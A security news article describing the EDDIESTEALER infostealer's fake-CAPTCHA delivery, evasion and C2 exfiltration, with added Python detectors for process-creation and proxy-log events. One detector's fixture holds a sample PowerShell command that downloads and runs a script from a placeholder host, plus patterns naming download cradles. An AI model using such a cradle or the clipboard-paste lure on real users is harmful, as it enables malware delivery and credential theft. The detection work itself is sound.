New Rust-Powered InfoStealer Exploits Fake CAPTCHA to Spread EDDIESTEALER

Security researchers at Elastic Security Labs have identified a sophisticated new Rust-based infostealer, dubbed EDDIESTEALER, deployed through an inventive Fake CAPTCHA social engineering campaign.

This operation leverages adversary-controlled web infrastructure to spread the malware, primarily targeting Windows hosts and focusing on the exfiltration of credentials, browser information, cryptocurrency wallet contents, and other sensitive data.

Technical Overview of the Attack Chain

The campaign’s initial access vector involves the use of compromised websites that serve a highly convincing, React-based fake CAPTCHA mimicking Google’s reCAPTCHA widget.

Figure: Fake CAPTCHA GUI

Unsuspecting victims are prompted to “verify you are a human” by following a sequence of clipboard and keyboard actions: the malicious webpage silently uses JavaScript to copy a PowerShell command to the user’s clipboard, instructs them to open the Windows Run dialog (Win + R), paste the content, and execute the command.

This method exploits user trust and browser familiarity, enabling the stealthy delivery of a malicious JavaScript payload (gverify.js) from attacker-controlled infrastructure (e.g., llll[.]fit).

This loader script then downloads and executes the main Rust infostealer binary, which is saved under a pseudorandom filename in the user’s Downloads directory.
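The chain described above leaves a distinctive process-creation trace: a scripting interpreter whose parent is explorer.exe (the Run dialog) and whose command line carries a download cradle. The scorer below is an added example, not code from the article or from Elastic's report; the event field names follow the shape of a Sysmon Event ID 1 record and the sample events, including the loader.example domain, are constructed.

```python
"""Constructed process-creation events (Sysmon Event ID 1 shape; field names assumed) and
a scorer for the fake-CAPTCHA chain: an interpreter spawned by explorer.exe from the
Run dialog whose command line carries a download/execute cradle."""
import re

# Common PowerShell download/execute cradles and the encoded-command switch.
CRADLE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|iex|"
    r"invoke-expression|frombase64string)\b|-e(nc|ncodedcommand)?\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe")

def score_event(ev):
    """Return (score, reasons) for one event; non-interpreter children score 0."""
    reasons = []
    if not ev["image"].lower().endswith(INTERPRETERS):
        return 0, reasons
    # Win+R runs the pasted command as a child of explorer.exe.
    if ev["parent_image"].lower().endswith("explorer.exe"):
        reasons.append("interpreter spawned by explorer.exe (Run dialog / shell)")
    if CRADLE.search(ev["command_line"]):
        reasons.append("download/execute cradle in command line")
    if HIDDEN.search(ev["command_line"]):
        reasons.append("hidden window requested")
    return len(reasons), reasons

def find_suspicious(events, threshold=3):
    """Return [(command_line, reasons)] for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["command_line"], reasons))
    return hits

# Constructed samples; loader.example is a placeholder, not the campaign's domain.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": 'powershell -w hidden -c "iwr http://loader.example/gverify.js '
                     '-OutFile $env:TEMP\\g.js; wscript $env:TEMP\\g.js"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
    {"parent_image": r"C:\Program Files\Vendor\agent.exe", "image": PS,
     "command_line": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell Get-Process"},
]
```

Only the first sample crosses the threshold; an admin-launched script and an interactive `Get-Process` from the Run dialog score too low, which is the point of combining parent, cradle and window-style signals rather than alerting on any PowerShell start.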

The primary payload, EDDIESTEALER, employs multiple evasion and obfuscation techniques, complicating both static and dynamic analysis.

EDDIESTEALER’s adoption of Rust reflects a broader trend of threat actors leveraging modern programming languages for increased stealth and analysis resistance.

Figure: EDDIESTEALER’s execution chain

Rust’s memory safety guarantees, zero-cost abstractions, and complex compiler optimizations create significant hurdles for malware analysts.

Most revealing strings within the binary are encrypted using custom XOR routines and decrypted only at runtime.

Standard library and API calls are further obfuscated via a custom WinAPI resolver, dynamically loading and resolving imports as needed.

Upon execution, the malware immediately creates a mutex using a decrypted, unique UUID to avoid multiple infections on the same host.

It performs a quick check of physical memory (expecting more than 4 GB) as a weak sandbox detection, self-deleting if the check fails.

The self-deletion mechanism employs NTFS Alternate Data Streams to bypass file locks, mimicking techniques seen in other modern infostealers like LATRODECTUS.

Command-and-Control

Initial configuration data is stored as encrypted strings in the binary, decoded to build a C2 URI of the form <C2>/<resource_path>/<UUID>.

EDDIESTEALER retrieves an AES-encrypted task list from its C2 server, instructing it on which files to target.

These targets include a broad array of data sources: major browsers (Chrome, Edge, Firefox, Brave), cryptocurrency wallets (e.g., Electrum, Exodus, Coinomi), password managers (Bitwarden, KeePass), FTP clients (FileZilla, FTP Getter), and messaging apps (Telegram Desktop).

For browsers utilizing application-bound encryption, EDDIESTEALER incorporates reimplementations of open-source projects like ChromeKatz in Rust to extract secrets, including launching hidden browser instances to access in-memory decrypted credentials.

According to the Elastic Security Labs report, the malware sequentially sends AES-encrypted, Base64-encoded POST requests back to its C2 server, one per task, containing the stolen data.

Notably, C2 communications are conducted over HTTP rather than HTTPS, further distinguishing EDDIESTEALER’s traffic patterns.

Newer EDDIESTEALER samples demonstrate expanded system reconnaissance capabilities, such as enumerating running processes and CPU/GPU details, and leverage server-side sandbox checks to thwart automated analysis environments.

Function inlining and heavy string/data obfuscation are increasingly prevalent, exacerbated by Rust’s aggressive compiler optimizations.

Debugging and analysis are further impeded by these measures, although embedded Rust panic metadata leaks internal source file paths, offering rare glimpses into the malware authors’ development environment.

The campaign appears to be rapidly evolving, and researchers have uncovered at least 15 unique samples to date, distributed through shifting infrastructure and C2 endpoints.

EDDIESTEALER activity aligns closely with MITRE ATT&CK tactics including Initial Access (phishing/content injection), Execution (user execution, command and scripting interpreter), Defense Evasion, Credential Access, Collection, and Exfiltration.

Behavioral detection, such as monitoring for suspicious PowerShell execution, unauthorized credential access, and abnormal HTTP POST patterns, remains critical.
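The C2 traffic shape described in this section (a URI of the form <C2>/<resource_path>/<UUID>, AES-encrypted Base64 bodies, plain HTTP, one POST per task) is narrow enough to hunt for in proxy logs. The detector below is an added example, not from the article or Elastic's report; the log format, the IPs and the UUID are constructed placeholders, and the entropy threshold is an assumed heuristic.

```python
"""Constructed web-proxy log lines plus a detector for the C2 traffic shape described
above: repeated plain-HTTP POSTs to <C2>/<resource_path>/<UUID> carrying opaque
Base64 bodies. Log format, IPs and the UUID are assumptions/placeholders."""
import math
import re
from collections import Counter

# URI shape from the article: plain http://, one path segment, then a UUID.
UUID_URI = re.compile(r"^http://[^/\s]+/[^/\s]+/[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
B64_BODY = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

SAMPLE_LOG = """\
2025-05-30T10:01:02Z 10.0.0.5 POST http://198.51.100.7/api/3f2b9e5c-1a4d-4e8f-9b0c-7d6e5a4f3b21 U2FsdGVkX1+7Gf3ZQw9k1VcY8iJbQ1xm2pQ7sHk4a9o=
2025-05-30T10:01:05Z 10.0.0.5 POST http://198.51.100.7/api/3f2b9e5c-1a4d-4e8f-9b0c-7d6e5a4f3b21 9wGQ3bZ0xKpL2mNvRt8sYuIoPaSdFgHjKlZxCvBnM1q=
2025-05-30T10:01:09Z 10.0.0.5 POST http://198.51.100.7/api/3f2b9e5c-1a4d-4e8f-9b0c-7d6e5a4f3b21 kT7vX2mQ9pLzR4cN8bW1yH6sJ3dF0gA5eU+Zo/x=
2025-05-30T10:02:00Z 10.0.0.9 POST https://login.example/oauth/token grant_type=refresh_token&client_id=abc
2025-05-30T10:02:30Z 10.0.0.9 GET http://updates.example/feed/3f2b9e5c-1a4d-4e8f-9b0c-7d6e5a4f3b21 -
2025-05-30T10:03:00Z 10.0.0.12 POST http://198.51.100.7/api/3f2b9e5c-1a4d-4e8f-9b0c-7d6e5a4f3b21 {"status":"ok"}
"""

def entropy(s):
    """Shannon entropy in bits per character; Base64 of ciphertext sits near 5-6 bits."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def parse(line):
    ts, src, method, url, body = line.split(" ", 4)
    return {"ts": ts, "src": src, "method": method, "url": url, "body": body}

def looks_like_c2_post(rec):
    body = rec["body"]
    return (rec["method"] == "POST"
            and UUID_URI.match(rec["url"]) is not None
            and B64_BODY.match(body) is not None
            and len(body) % 4 == 0
            and entropy(body) > 4.0)  # cheap guard against padded/repetitive Base64

def find_c2_beacons(log_text, min_posts=3):
    """Return {(src, url): count} for hosts repeatedly sending such POSTs to one URI."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse(line)
        if looks_like_c2_post(rec):
            counts[(rec["src"], rec["url"])] += 1
    return {key: n for key, n in counts.items() if n >= min_posts}

if __name__ == "__main__":
    for (src, url), n in find_c2_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {url}: {n} opaque POSTs over plain HTTP")
```

Base64-wrapped JSON from a legitimate app would pass the body test too, so the URI shape, the absence of TLS and the repetition from one host carry most of the weight; tune min_posts to the task-list sizes seen in your environment.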

Indicators of Compromise (IOCs)


Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
